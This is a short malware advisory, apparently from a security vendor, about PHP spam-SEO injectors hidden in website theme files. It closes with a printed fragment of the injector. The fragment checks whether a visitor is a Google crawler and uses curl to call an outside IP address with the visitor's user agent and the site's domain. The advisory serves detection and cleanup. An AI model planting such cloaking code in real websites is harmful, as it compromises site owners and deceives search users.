Blackhat SEO is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as malicious iframe, or redirect) is visible in the browser, not the malicious code itself.
Spam-seo injectors are pieces of PHP code, usually appended to the end of the theme's header and footer files, which actively downloads spam content from other compromised sites to insert into the victim site. They use obfuscation and encoding techniques to prevent to be detected by regular users or automated tools.
This malicious code affects any vulnerable or compromised website that is configured to interpret the script language.
Inspect your site's files, specially theme related, to find for code you don't recognize. Look for any encoded or obfuscated PHP code. Also, you can contact Sucuri to help you with the infection removal.
if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google'))
$isbot = 1;
$_SERVER[HTTP_USER_AGENT] = str_replace(" ", "-", $_SERVER[HTTP_USER_AGENT]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://18.104.22.168/cakes/?useragent=$_SERVER[HTTP_USER_AGENT]&domain=$_SERVER[HTTP_HOST]");
$result = curl_exec($ch);